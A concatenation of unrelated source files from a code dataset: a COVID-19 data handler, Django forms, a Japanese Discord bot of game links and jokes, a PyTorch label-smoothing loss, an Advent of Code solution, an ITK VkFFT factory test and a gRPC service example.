_output = await publish_queue(
broker_queue=settings.BROKER_QUEUE_CREATE_ORDER,
broker_exchange=settings.BROKER_EXCHANGE_ORDERS,
body_queue=_order_broker_message.json().encode("utf-8")
)
if not hasattr(_output, "index"):
raise Exception("Order not queue")
return messageBaseResponse(
queue_index=_output.index,
order_id=message.id,
user_id=message.user_id,
product_code=message.product_code,
customer_fullname=message.customer_fullname,
product_name=message.product_name,
total_amount=message.total_amount,
created_at=message.created_at,
)
except Exception as e:
logger.error(f"Error in send message to broker {e}")
raise e
|
StarcoderdataPython
|
3301368
|
<reponame>rebeccadavidsson/covid19-sir
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import numpy as np
import pandas as pd
from covsirphy.util.error import NotInteractiveError
from covsirphy.util.plotting import line_plot
from covsirphy.cleaning.term import Term
from covsirphy.cleaning.jhu_data import JHUData
from covsirphy.cleaning.population import PopulationData
class DataHandler(Term):
"""
Data handler for scenario analysis.
Args:
jhu_data (covsirphy.JHUData): object of records
population_data (covsirphy.PopulationData): PopulationData object
country (str): country name
province (str or None): province name
auto_complement (bool): if True and necessary, the number of cases will be complemented
"""
def __init__(self, jhu_data, population_data, country, province=None, auto_complement=True):
# Population
population_data = self.ensure_instance(
population_data, PopulationData, name="population_data")
self.population = population_data.value(country, province=province)
# Records
self.jhu_data = self.ensure_instance(
jhu_data, JHUData, name="jhu_data")
# Area name
self.country = country
self.province = province or self.UNKNOWN
self.area = JHUData.area_name(country, province)
# Whether complement the number of cases or not
self._auto_complement = bool(auto_complement)
self._complemented = False
# Create {scenario_name: PhaseSeries} and set records
self.record_df = pd.DataFrame()
self._first_date = None
self._last_date = None
# Interactive (True) / script (False) mode
self._interactive = hasattr(sys, "ps1")
def init_records(self):
"""
Set records.
Only when auto-complement mode, complement records if necessary.
"""
# Set records (complement records, if necessary)
self.record_df, self._complemented = self.jhu_data.records(
country=self.country, province=self.province,
start_date=self._first_date, end_date=self._last_date,
population=self.population,
auto_complement=self._auto_complement
)
# First/last date of the records
if self._first_date is None:
series = self.record_df.loc[:, self.DATE]
self._first_date = series.min().strftime(self.DATE_FORMAT)
self._last_date = series.max().strftime(self.DATE_FORMAT)
@property
def first_date(self):
"""
str: the first date of the records
"""
return self._first_date
@first_date.setter
def first_date(self, date):
self.ensure_date_order(self._first_date, date, name="date")
self.ensure_date_order(date, self._last_date, name="date")
self._first_date = date
self.init_records()
@property
def last_date(self):
"""
str: the last date of the records
"""
return self._last_date
@last_date.setter
def last_date(self, date):
self.ensure_date_order(self._first_date, date, name="date")
self.ensure_date_order(date, self._last_date, name="date")
self._last_date = date
self.init_records()
@property
def interactive(self):
"""
bool: interactive mode (display figures) or not
Note:
When running scripts, interactive mode cannot be selected.
"""
return self._interactive
@interactive.setter
def interactive(self, is_interactive):
if not hasattr(sys, "ps1") and is_interactive:
raise NotInteractiveError
self._interactive = hasattr(sys, "ps1") and bool(is_interactive)
def line_plot(self, df, show_figure=True, filename=None, **kwargs):
"""
Display or save a line plot of the dataframe.
Args:
show_figure (bool): whether show figure when interactive mode or not
filename (str or None): filename of the figure or None (not save) when script mode
Note:
When interactive mode and @show_figure is True, display the figure.
When script mode and filename is not None, save the figure.
When using interactive shell, we can change the modes by Scenario.interactive = True/False.
"""
if self._interactive and show_figure:
return line_plot(df=df, filename=None, **kwargs)
if not self._interactive and filename is not None:
return line_plot(df=df, filename=filename, **kwargs)
def complement(self, interval=2, max_ignored=100):
"""
Complement the number of recovered cases, if necessary.
Args:
interval (int): expected update interval of the number of recovered cases [days]
max_ignored (int): Max number of recovered cases to be ignored [cases]
Returns:
covsirphy.Scenario: self
"""
self.record_df, self._complemented = self.jhu_data.records(
country=self.country, province=self.province,
start_date=self._first_date, end_date=self._last_date,
population=self.population,
auto_complement=True, interval=interval, max_ignored=max_ignored
)
return self
def complement_reverse(self):
"""
Restore the raw records. Reverse method of covsirphy.Scenario.complement().
Returns:
covsirphy.Scenario: self
"""
self.record_df, self._complemented = self.jhu_data.records(
country=self.country, province=self.province,
start_date=self._first_date, end_date=self._last_date,
population=self.population,
auto_complement=False
)
return self
def show_complement(self, **kwargs):
"""
Show the details of complement that was (or will be) performed for the records.
Args:
kwargs: keyword arguments of JHUDataComplementHandler(), control factors of complement
Returns:
pandas.DataFrame: as the same as `JHUData.show_complement()
"""
return self.jhu_data.show_complement(
country=self.country, province=self.province,
start_date=self._first_date, end_date=self._last_date, **kwargs)
def records(self, variables=None, **kwargs):
"""
Return the records as a dataframe.
Args:
show_figure (bool): if True, show the records as a line-plot.
variables (list[str] or None): variables to include, Infected/Fatal/Recovered when None
kwargs: the other keyword arguments of Scenario.line_plot()
Returns:
pandas.DataFrame
Index:
reset index
Columns:
- Date (pd.TimeStamp): Observation date
- Columns set by @variables (int)
Note:
- Records with Recovered > 0 will be selected.
- If complement was performed by Scenario.complement() or Scenario(auto_complement=True),
The kind of complement will be added to the title of the figure.
- @variables can be selected from Susceptible/Confirmed/Infected/Fatal/Recovered.
"""
variables = self.ensure_list(
variables or [self.CI, self.F, self.R],
candidates=[self.S, *self.VALUE_COLUMNS], name="variables")
df = self.record_df.loc[:, [self.DATE, *variables]]
if self._complemented:
title = f"{self.area}: Cases over time\nwith {self._complemented}"
else:
title = f"{self.area}: Cases over time"
self.line_plot(
df=df.set_index(self.DATE), title=title, y_integer=True, **kwargs)
return df
def records_diff(self, variables=None, window=7, **kwargs):
"""
Return the number of daily new cases (the first discreate difference of records).
Args:
variables (str or None): variables to show
window (int): window of moving average, >= 1
kwargs: the other keyword arguments of Scenario.line_plot()
Returns:
pandas.DataFrame
Index:
- Date (pd.TimeStamp): Observation date
Columns:
- Confirmed (int): daily new cases of Confirmed, if calculated
- Infected (int): daily new cases of Infected, if calculated
- Fatal (int): daily new cases of Fatal, if calculated
- Recovered (int): daily new cases of Recovered, if calculated
Note:
@variables will be selected from Confirmed, Infected, Fatal and Recovered.
If None was set as @variables, ["Confirmed", "Fatal", "Recovered"] will be used.
"""
variables = self.ensure_list(
variables or [self.C, self.F, self.R], candidates=self.VALUE_COLUMNS, name="variables")
window = self.ensure_natural_int(window, name="window")
df = self.record_df.set_index(self.DATE)[variables]
df = df.diff().dropna()
df = df.rolling(window=window).mean().dropna().astype(np.int64)
if self._complemented:
title = f"{self.area}: Daily new cases\nwith {self._complemented}"
else:
title = f"{self.area}: Daily new cases"
self.line_plot(df=df, title=title, y_integer=True, **kwargs)
return df
|
StarcoderdataPython
|
5178675
|
for i in range(129):
j = (1 << i)
print(i, (j-1).bit_length(), (j).bit_length(), (j+1).bit_length())
print(i, (-j-1).bit_length(), (-j).bit_length(), (-j+1).bit_length())
|
StarcoderdataPython
|
199499
|
<reponame>JuneMuoti/Hood-watch
from .models import User,Post
from django import forms
class ProfileForm(forms.ModelForm):
class Meta:
model = User
exclude = []
widgets = {}
class PostForm(forms.ModelForm):
class Meta:
model = Post
exclude = []
widgets = {}
class HoodForm(ProfileForm):
class Meta:
model=User
fields=[
'hood','user_id'
]
widgets={}
|
StarcoderdataPython
|
4843048
|
from discord.ext import commands
import asyncio
import random
import os
import math
import traceback
from datetime import datetime
from discord.ext import commands
from discord.ext import tasks
import threading
ID_role_1 = 767249291730747403
ID_role_2 = 767200011749949470
ID_role_3 = 767200106557865985
ID_role_tk = 767200196827676683
ID_clanmember = 666361330827132979
ID_readme = 768272323341320232
ID_role_test = 760094885364629524
prefix = '/'
token = os.environ['DISCORD_BOT_TOKEN']
# プリコネキャラ
class SkillMotionGIF(commands.Cog, name = 'スキルモーション'):
def __init__(self, bot):
super().__init__()
self.bot = bot
@commands.command()
async def kurisu(self,ctx):
"""クリス"""
await ctx.send('https://gyazo.com/39f3bddc360ed09f20431c79d809e3fb')
await ctx.message.delete()
@commands.command()
async def mizumakoto(self,ctx):
"""マコト(サマー)"""
await ctx.send('https://i.gyazo.com/6e1c942142ce952e7b15c8f1aa6e6d73 \n 水が弾けたら')
await ctx.message.delete()
@commands.command()
async def makoto(self,ctx):
"""マコト"""
await ctx.send('https://i.gyazo.com/016e0804ce330f11c6fcf75a60f89277 \n 黄色の鳴き声が消えたら')
await ctx.message.delete()
@commands.command()
async def muimi(self,ctx):
"""ムイミ"""
await ctx.send('https://i.gyazo.com/016e0804ce330f11c6fcf75a60f89277 \n 左斜め後ろに飛んだ時')
await ctx.message.delete()
@commands.command()
async def tamaki(self,ctx):
"""タマキ"""
await ctx.send('https://i.gyazo.com/ede0b883427fbbe2dbd944d03f0d3030')
await ctx.message.delete()
@commands.command()
async def onon(self,ctx):
"""ニノン(オーエド)"""
await ctx.send('https://gyazo.com/9ef7490093e2ce4114fc33b49b68a9f9')
await ctx.message.delete()
@commands.command()
async def mizuna(self,ctx):
"""スズナ(サマー)"""
await ctx.send('https://i.gyazo.com/2b2c3b9dc2856a1d55d167bf920af87d')
await ctx.message.delete()
@commands.command()
async def neneka(self,ctx):
"""ネネカ"""
await ctx.send('https://i.gyazo.com/588cb732059044e1be0712694eadcffd')
await ctx.message.delete()
@commands.command()
async def puripeko(self,ctx):
"""ペコリーヌ(プリンセス)"""
await ctx.send('https://gyazo.com/0f0514e31d8b6136f87c33184b649b8d \n 切った後に剣を振り上げたタイミングでバフ付与')
await ctx.message.delete()
@commands.command()
async def mizukyaru(self,ctx):
"""キャル(サマー)"""
await ctx.send('https://i.gyazo.com/cf8625a0f3fbe7ce5a47f00e2305568a')
await ctx.message.delete()
@commands.command()
async def purikoro(self,ctx):
"""コッコロ(プリンセス)"""
await ctx.send('https://gyazo.com/04ffe3e6e434d79c816a837e435c1ff1')
await ctx.message.delete()
@commands.command()
async def harokyo(self,ctx):
"""キョウカ(ハロウィン)"""
await ctx.send('https://i.gyazo.com/60d59c64eb5c8a9443bd4de074cc03de \n 箒を突き刺した時/箒を振り終わった後')
await ctx.message.delete()
@commands.command()
async def mizusaren(self,ctx):
"""サレン(サマー)"""
await ctx.send('https://gyazo.com/c22d7996cb2d8e91ae7308b53c66d6d4 \n 右を向いた時')
await ctx.message.delete()
@commands.command()
async def nyukkoro(self,ctx):
"""コッコロ(ニューイヤー)"""
await ctx.send('https://gyazo.com/c29e006bf82ce2fb0e3b44c06405a9ce \n 左を向いた時')
await ctx.message.delete()
@commands.command()
async def haromimi(self,ctx):
"""ミミ(ハロウィン)"""
await ctx.send('https://i.gyazo.com/42f21611ee06890d48f4ffd4d38e6476 \n ぴょん ぴょん ぴょこ←ココ')
await ctx.message.delete()
@commands.command()
async def bazuru(self,ctx):
"""シズル(バレンタイン)"""
await ctx.send('https://i.gyazo.com/87b47efe83e874247b66519ce2caa78b')
await ctx.message.delete()
@commands.command()
async def kuritika(self,ctx):
"""チカ(クリスマス)"""
await ctx.send('https://i.gyazo.com/d9b5fcdfca2cac56f82cfd1c9feefd9d \n 足元に魔法陣が出たら/tp配布の数字を見る')
await ctx.message.delete()
@commands.command()
async def yuni(self,ctx):
"""ユニ"""
await ctx.send('https://gyazo.com/67a7c23623583779f069e697df22aa23 \n どちらもジャンプ着地時')
await ctx.message.delete()
@commands.command()
async def rei(self,ctx):
"""レイ"""
await ctx.send('https://i.gyazo.com/4dd4fbfc1687f4529e2f474a84c7a991')
await ctx.message.delete()
@commands.command()
async def suzuna(self,ctx):
"""スズナ"""
await ctx.send('https://gyazo.com/0f21de3dba9d6d69dee31ef7991b71fc')
await ctx.message.delete()
@commands.command()
async def an(self,ctx):
"""アン"""
await ctx.send('https://gyazo.com/4771ba5961617b5d66e8fe2aacdc3562')
await ctx.message.delete()
@commands.command()
async def misato(self,ctx):
"""ミサト"""
await ctx.send('https://gyazo.com/d759d75e36acd6942f1e20d5bf5654ba')
await ctx.message.delete()
@commands.command()
async def mizumaho(self,ctx):
"""マホ(サマー)"""
await ctx.send('https://gyazo.com/2848612666b463901e2960c0282685b5')
await ctx.message.delete()
@commands.command()
async def haromiso(self,ctx):
"""ミソギ(ハロウィン)"""
await ctx.send('https://gyazo.com/667afa5b86200885f706cd8cf65e7651')
await ctx.message.delete()
@commands.command()
async def hiyori(self,ctx):
"""ヒヨリ"""
await ctx.send('https://gyazo.com/0fceb161f3ddeb1807f048271416525f')
await ctx.message.delete()
@commands.command()
async def mizuhatsune(self,ctx):
"""ハツネ(サマー)"""
await ctx.send('https://gyazo.com/84891d66caf2de0092a9041020d9145e')
await ctx.message.delete()
@commands.command()
async def mizutama(self,ctx):
"""タマキ(サマー)"""
await ctx.send('https://gyazo.com/b83b2ad4e9e769321a66749da3a59466')
await ctx.message.delete()
@commands.command()
async def haromiya(self,ctx):
"""ミヤコ(ハロウィン)"""
await ctx.send('https://gyazo.com/f95a085630f753ee75f89bd666588484')
await ctx.message.delete()
@commands.command()
async def nyuyori(self,ctx):
"""ヒヨリ(ニューイヤー)"""
await ctx.send('https://gyazo.com/fc9f5b592ccfabd7a138977e6d97e774')
await ctx.message.delete()
@commands.command()
async def tieru(self,ctx):
"""チエル"""
await ctx.send('https://gyazo.com/828212c3cc6121942c37c8788425d5d2')
await ctx.message.delete()
@commands.command()
async def erogaki(self,ctx):
"""アカリ(エロガキ)"""
await ctx.send('https://gyazo.com/0fa628c9a38b842fb48ab404cc57f6b5 \n S1:着地で押す')
await ctx.message.delete()
@commands.command()
async def rabirisuta(self,ctx):
"""ラビリスタ"""
await ctx.send('https://i.gyazo.com/83468807130359544b8f7c987f5fabc3 \n https://i.gyazo.com/26bb2398837fb68c2fbd0bae128c88a7')
await ctx.message.delete()
@commands.command()
async def akino(self,ctx):
"""アキノ"""
await ctx.send('https://i.gyazo.com/095793437d33fce8cd982be40c0c39fa')
await ctx.message.delete()
class DamageCalc(commands.Cog, name = '持ち越し計算機'):
def __init__(self, bot):
super().__init__()
self.bot = bot
@commands.command()
async def motikosi(self,ctx, boss: int, p1: int, p2: int):
"""持越し時間計算機 /motikosi (凸時のボスHP) (先に抜ける人の与ダメ) (後に抜ける人の与ダメ)"""
total = p1 + p2
if total > boss and p1 < boss and p2 < boss:
cotime = 90 - (90*(boss-p1)/p2) + 20
text = "持ち越し時間は" + str(math.ceil(cotime)) + "秒です"
else:
text = "持ち越しは発生しません"
#await ctx.send(text)
sent = await ctx.send(text)
await asyncio.sleep(10)
await ctx.message.delete()
#sent = await ctx.send(text)
await sent.delete()
async def gyakusan(self,ctx, boss: int, p1: int):
"""90秒計算機 /gyakusan (凸時のボスHP) (先に抜ける人の与ダメ)"""
if p1 < boss:
codamage = 9*(boss-p1)/2
text = str(math.ceil(codamage)) + "ダメージ以上なら90秒持ち越します"
else:
text = "持ち越しは発生しません"
#await ctx.send(text)
sent = await ctx.send(text)
await asyncio.sleep(10)
await ctx.message.delete()
#ent = await ctx.send(text)
await sent.delete()
class BestUrl(commands.Cog, name = 'みんなのおすすめ'):
def __init__(self, bot):
super().__init__()
self.bot = bot
@commands.command()
async def jantama(self,ctx):
"""じゃんたま公式HP"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://game.mahjongsoul.com/')
await ctx.message.delete()
@commands.command()
async def dbd(self,ctx):
"""DbDストアページ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://store.steampowered.com/app/381210/Dead_by_Daylight/')
await ctx.message.delete()
@commands.command()
async def pubg(self,ctx):
"""pubuストアページ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://store.steampowered.com/app/578080/PLAYERUNKNOWNS_BATTLEGROUNDS/')
await ctx.message.delete()
@commands.command()
async def avabox(self,ctx):
"""avaboxページ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://ava.pmang.jp/avabox/boxtop')
await ctx.message.delete()
@commands.command()
async def patora(self,ctx):
"""周防パトラ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://www.youtube.com/channel/UCeLzT-7b2PBcunJplmWtoDg \n https://twitter.com/Patra_HNST')
await ctx.message.delete()
@commands.command()
async def suzuhara(self,ctx):
"""鈴原るる"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://www.youtube.com/channel/UC_a1ZYZ8ZTXpjg9xUY9sj8w')
await ctx.message.delete()
@commands.command()
async def syaruru(self,ctx):
"""しゃるる"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://www.twitch.tv/syaruru3 \n https://www.youtube.com/channel/UC5SYDKMBeExdFs0ocWiK6xw')
await ctx.message.delete()
@commands.command()
async def pekorakopipe(self,ctx):
"""ぺこらコピペ"""
await ctx.send('ぺこーらいつもありがとう! \n 最近ぺこーらへ感謝するのが日課になりつつあります! \n 単刀直入に我慢してたこと書いちゃう! \n ぺこーら愛してるぞおおおお \n (ps.厄介野うさぎだと思われてそうですがが長文赤スパ失礼! \n ちなみに読まれてる頃にはあまりの恥ずかしさにユニバーサル大回転ぺこぺこの舞₍ ◝(‘ω’)◟ ⁾⁾₍₍ ◝(‘ω’)◜ ₎₎しながらベットの上で暴れてると思うので率直な一言貰ってもいいですか?w \n 最後に一言!配信をはじめ本当にいつもありがとう!!! \n 野うさぎ達を大切に思ってくれてる姿勢冗談抜きで本当に好きです。 \n 応援するしがいがあります!')
await ctx.message.delete()
@commands.command()
async def l4d2(self,ctx):
"""l4d2ストアページ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://store.steampowered.com/app/550/Left_4_Dead_2/')
await ctx.message.delete()
@commands.command()
async def kogatan(self,ctx):
"""月岡恋鐘フィギュア"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + '月岡恋鐘フィギュアが予約開始!予約はこちらから!↓↓↓ \n https://www.goodsmile.info/ja/product/9770/%E6%9C%88%E5%B2%A1%E6%81%8B%E9%90%98+%E3%83%95%E3%82%A7%E3%82%A4%E3%82%B9%E3%82%AA%E3%83%96%E3%83%88%E3%83%AC%E3%82%B8%E3%83%A3%E3%83%BCVer.html')
await ctx.message.delete()
@commands.command()
async def ow(self,ctx):
"""クソゲ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://playoverwatch.com/ja-jp/')
await ctx.message.delete()
@commands.command()
async def apex(self,ctx):
"""apex公式"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://www.ea.com/ja-jp/games/apex-legends')
await ctx.message.delete()
@commands.command()
async def kaya(self,ctx):
"""ドラゴンズエンドフィ.gif"""
await ctx.send('https://cdn.discordapp.com/attachments/620957812247363594/731102733188333600/nXasbmNiZdEOItOpeAYD1594378196-1594378480_1.gif')
await ctx.message.delete()
@commands.command()
async def nyaru(self,ctx):
"""ニューイヤーバースト"""
await ctx.send('https://cdn.discordapp.com/attachments/620957812247363594/731098724406919179/image0.gif')
await ctx.message.delete()
@commands.command()
async def bga(self,ctx):
"""ボードゲームアリーナ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://ja.boardgamearena.com/')
await ctx.message.delete()
@commands.command()
async def swb(self,ctx):
"""サマーウルフェンブリッツ.gif"""
await ctx.send('http://cdn.gameinn.jp/wp-content/uploads/imgs/2020/03/Dz5PPIn.gif')
await ctx.message.delete()
@commands.command()
async def yabaiwayo(self,ctx):
"""ヤバいわよ.gif"""
await ctx.send('https://img.animanch.com/2020/05/1588593715655.gif')
await ctx.message.delete()
@commands.command()
async def ron(self,ctx):
"""ケインコスギの物まね"""
await ctx.send('https://www.youtube.com/watch?v=ZX5ctEzgbpw')
await ctx.message.delete()
@commands.command()
async def tensura(self,ctx):
"""転スラwiki"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://ja.wikipedia.org/wiki/%E8%BB%A2%E7%94%9F%E3%81%97%E3%81%9F%E3%82%89%E3%82%B9%E3%83%A9%E3%82%A4%E3%83%A0%E3%81%A0%E3%81%A3%E3%81%9F%E4%BB%B6')
await ctx.message.delete()
@commands.command()
async def tinpokopon(self,ctx):
"""ちんぽこぽん"""
await ctx.send('https://cdn.discordapp.com/attachments/638718958819606549/749276683302862891/pokopon.gif')
await ctx.message.delete()
@commands.command()
async def supusi(self,ctx):
"""プリコネスプシ"""
await ctx.send(ctx.message.author.name + "さん、どうぞ!" + 'https://docs.google.com/spreadsheets/d/1nCdtFHS-60WcRZDx8hTXHFm3mPuEqefntQxeRfM2Lv0/edit#gid=632518118')
await ctx.message.delete()
@commands.command()
async def saru(self,ctx):
"""さるさんを呼び出す"""
saru = [
'https://img.huffingtonpost.com/asset/5c63b0b72000008b026e784d.jpeg?ops=scalefit_960_noupscale',
'https://tenor.com/view/monkey-laughing-lol-laughing-hysterically-gif-17632955',
'https://cdn.discordapp.com/attachments/638718958819606549/749243434673635359/85635abe435992f4abf56c529f4b2be7.png',
'https://tenor.com/view/boat-monkey-driving-monkey-monkey-driving-boat-funny-monkey-gif-5232687']
await ctx.send(random.choice(saru) )
await ctx.message.delete()
@commands.command()
async def gorilla(self,ctx):
"""ローリングゴリラ"""
spingorilla = ['https://media1.tenor.com/images/d6efcdae8517b3f840b825171799b862/tenor.gif?itemid=17292343','https://media1.tenor.com/images/7986eaf1e2c4adcec62bb2276c18ddf4/tenor.gif?itemid=16499669']
await ctx.send(random.choice(spingorilla) )
await ctx.message.delete()
@commands.command()
async def howa(self,ctx):
"""ほわさんを呼び出す"""
howa = ['https://gyazo.com/2e64e20055545d61110c008050a8a016','https://gyazo.com/8d95c633faaf0a589631241d2274703f',
'https://gyazo.com/3e655e7f91e586737bdd22e3d2964dcc','https://gyazo.com/572820a2a4a350187563528143aa1f28',
'https://gyazo.com/b17a7733d777762ba75a3c9ed8bd9a47','https://media.discordapp.net/attachments/628175073504788491/748931562325803038/image0.png',
'https://cdn.discordapp.com/attachments/628175073504788491/749234343838351462/howa_1.png',
'https://gyazo.com/63c7a98e1657a7788a15c915604eb730',
'https://cdn.discordapp.com/attachments/628175073504788491/749234943447793674/2020-08-29_5.png',
'https://i.gyazo.com/thumb/1200/db0d354a6db0f23d5551bf2e4bfb1efb-png.jpg','https://gyazo.com/c2d098590fe775ee921fce983d72e2e4',
'https://gyazo.com/dee2d094a1ad9a89fee2012c38248783','https://gyazo.com/4d5dd57a27255343f2310c999c0e1261',
'https://gyazo.com/a01dd357ce772dae25305dd9700f5377']
await ctx.send(ctx.message.author.name + 'が <@!260693854070505472> 様を呼んでいるよ! \n ' + random.choice(howa) )
await ctx.message.delete()
@commands.command()
async def sarunokuruma(self,ctx):
"""さるさんが以前乗っていたくるま"""
await ctx.send('https://img.gifmagazine.net/gifmagazine/images/3083728/original.gif' )
await ctx.message.delete()
@commands.command()
async def ritoriri(self,ctx):
"""リトルリリカルの星6UB"""
await ctx.send('https://cdn.discordapp.com/attachments/668715128627396640/749213006784888842/image0.png' )
await ctx.message.delete()
@commands.command()
async def madoka(self,ctx):
"""お前樋口円香わかってなさすぎるだろ"""
await ctx.send('https://media.discordapp.net/attachments/668715128627396640/749213459954270208/image0.jpg' )
await ctx.message.delete()
@commands.command()
async def kuritorisu(self,ctx):
"""クリスマストリスターナ"""
await ctx.send('https://gyazo.com/c5a65d91fd08167cc4aabeea55b047fc' )
await ctx.message.delete()
@commands.command()
async def waruine(self,ctx):
"""わるいね収容者リスト"""
await ctx.send('https://twitter.com/i/lists/1227212620387643392' )
await ctx.message.delete()
@commands.command()
async def sarurage(self,ctx):
"""さるさんがおこった"""
await ctx.send('https://www.youtube.com/watch?v=GhxqIITtTtU' )
await ctx.message.delete()
@commands.command()
async def gemagema(self,ctx):
"""社会不適合者"""
await ctx.send('https://discordapp.com/channels/620957163992383500/638718958819606549/791677634127200307' )
await ctx.message.delete()
@commands.command()
async def sime(self,ctx):
"""〆"""
await ctx.send('https://cdn.discordapp.com/attachments/668715128627396640/749583481121669120/EglWTaVVgAEIIBG.png' )
await ctx.message.delete()
@commands.command()
async def gyouza(self,ctx):
"""ぎょうさ"""
await ctx.send('https://cdn.discordapp.com/attachments/638718958819606549/749650658784837753/E9A483E5AD90E38391E383AAE38383E381A8E38195E3819BE3819FE3818FE381A601.png' )
await ctx.message.delete()
@commands.command()
async def gacha(self,ctx):
"""ガチャシミュレータ"""
gacha = ['10','20','30','40','50','60','70','80','90','100','110','120','130','140','150','160','170','180','190','200','210','220','230','240','250','260','270','280','290','300']
await ctx.send(ctx.message.author.name + 'は' + random.choice(gacha) + '連で出ます' )
await ctx.message.delete()
@commands.command()
async def gachapopimasa(self,ctx):
"""ガチャシミュレータ"""
await ctx.send('ぽぴまさは単発で出ます' )
await ctx.message.delete()
class Game(commands.Cog, name = 'おもちゃ'):
def __init__(self, bot):
super().__init__()
self.bot = bot
@commands.command()
async def uranai(self,ctx):
"""占い"""
#レスポンスされる運勢のリストを作成
unsei = ["大吉", "中吉", "吉", "末吉", "小吉", "凶", "大凶"]
choice = random.choice(unsei) #randomモジュールでunseiリストからランダムに一つを選出
await ctx.send(choice)
@commands.command()
async def janken(self,ctx):
"""じゃんけん"""
#レスポンスされる運勢のリストを作成
janken = ["<:31lolgoo:666949640955887628>", "✌️ ", "🖐️"]
choice = random.choice(janken) #randomモジュールでunseiリストからランダムに一つを選出
await ctx.send(choice)
bot = commands.Bot(command_prefix=prefix)
bot.add_cog(SkillMotionGIF(bot=bot))
bot.add_cog(DamageCalc(bot=bot))
bot.add_cog(BestUrl(bot=bot))
bot.add_cog(Game(bot=bot))
bot.run(token)
|
StarcoderdataPython
|
229961
|
from torch.nn import CrossEntropyLoss
from torch.nn.functional import nll_loss, log_softmax
class LabelSmoothingCrossEntropy(CrossEntropyLoss):
def __init__(self, eps: float = 0.1, *args, **kwargs):
super().__init__(*args, **kwargs)
self.eps = eps
def forward(self, output, target):
c = output.size()[-1]
log_preds = log_softmax(output, dim=-1)
if self.reduction == 'sum':
loss = -log_preds.sum()
else:
loss = -log_preds.sum(dim=-1)
if self.reduction == 'mean':
loss = loss.mean()
nl = nll_loss(log_preds, target, reduction=self.reduction)
return loss * self.eps / c + (1 - self.eps) * nl
__all__ = ['LabelSmoothingCrossEntropy']
|
StarcoderdataPython
|
6653950
|
<gh_stars>0
"""Advent of Code 2017 Day 4."""
def main(file_input='input.txt'):
passphrases = [line.strip().split()
for line in get_file_contents(file_input)]
validators = (
('no duplicates', no_duplicates),
('no anagrams', no_anagrams),
)
for description, validator in validators:
valid_passphrases = validate_passphrases(passphrases, validator)
print(f'Valid passphrases with rule {description}: '
f'{len(valid_passphrases)}')
def validate_passphrases(passphrases, validator):
"""Validate passphrases with validator function."""
return [passphrase for passphrase in passphrases
if validator(passphrase)]
def no_anagrams(passphrase):
"""Checks if passphrase doesn't contain words that are anagrams."""
anagrams = set(''.join(sorted(word)) for word in passphrase)
return len(passphrase) == len(anagrams)
def no_duplicates(passphrase):
"""Checks if passphrase doesn't contain duplicated words."""
return len(passphrase) == len(set(passphrase))
def get_file_contents(file):
"""Read all lines from file."""
with open(file) as f:
return f.readlines()
if __name__ == '__main__':
main()
|
StarcoderdataPython
|
3544733
|
<reponame>tbirdso/ITKVkFFTBackend<gh_stars>0
# ==========================================================================
#
# Copyright NumFOCUS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0.txt
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Verify that object factory initialization succeeds on itk module loading
# such that ITK VkFFT classes are instantiated as the default FFT image filter
# implementation through the object factory backend
import itk
itk.auto_progress(2)
real_type = itk.F
dimension = 3
real_image_type = itk.Image[real_type, dimension]
complex_image_type = itk.Image[itk.complex[real_type], dimension]
# Verify all FFT base filter types are instantiated with VkFFT accelerated backend
image_filter_list = [
(
itk.ComplexToComplex1DFFTImageFilter[complex_image_type],
itk.VkComplexToComplex1DFFTImageFilter[complex_image_type],
),
(
itk.ComplexToComplexFFTImageFilter[complex_image_type],
itk.VkComplexToComplexFFTImageFilter[complex_image_type],
),
(
itk.HalfHermitianToRealInverseFFTImageFilter[
complex_image_type, real_image_type
],
itk.VkHalfHermitianToRealInverseFFTImageFilter[complex_image_type],
),
(
itk.Forward1DFFTImageFilter[real_image_type],
itk.VkForward1DFFTImageFilter[real_image_type],
),
(
itk.ForwardFFTImageFilter[real_image_type, complex_image_type],
itk.VkForwardFFTImageFilter[real_image_type],
),
(
itk.Inverse1DFFTImageFilter[complex_image_type],
itk.VkInverse1DFFTImageFilter[complex_image_type],
),
(
itk.InverseFFTImageFilter[complex_image_type, real_image_type],
itk.VkInverseFFTImageFilter[complex_image_type],
),
(
itk.RealToHalfHermitianForwardFFTImageFilter[
real_image_type, complex_image_type
],
itk.VkRealToHalfHermitianForwardFFTImageFilter[real_image_type],
),
]
for (base_filter_type, vk_filter_type) in image_filter_list:
# Instantiate through the ITK object factory
image_filter = base_filter_type.New()
assert image_filter is not None
try:
print(
f"Instantiated default FFT image filter backend {image_filter.GetNameOfClass()}"
)
# Verify object can be cast to ITK VkFFT filter type
vk_filter_type.cast(image_filter)
except RuntimeError as e:
print(f"ITK VkFFT filter was not instantiated as default backend!")
raise e
|
StarcoderdataPython
|
3287303
|
# !/usr/local/python/bin/python
# -*- coding: utf-8 -*-
# (C) <NAME>, 2021
# All rights reserved
# @Author: '<NAME> <<EMAIL>>'
# @Time: '7/2/21 3:09 PM'
# 3p
from mask import Mask
from mask_prometheus import Prometheus
# project
from examples.protos.hello_pb2 import HelloResponse
app = Mask(__name__)
app.config["REFLECTION"] = True
app.config["DEBUG"] = True
app.config["PROMETHEUS_PORT"] = 18080
prometheus = Prometheus()
prometheus.init_app(app)
@app.route(method="SayHello", service="Hello")
def say_hello_handler(request, context):
""" Handler SayHello request
"""
return HelloResponse(message="Hello Reply: %s" % request.name)
@app.route(method="SayHelloStream", service="Hello")
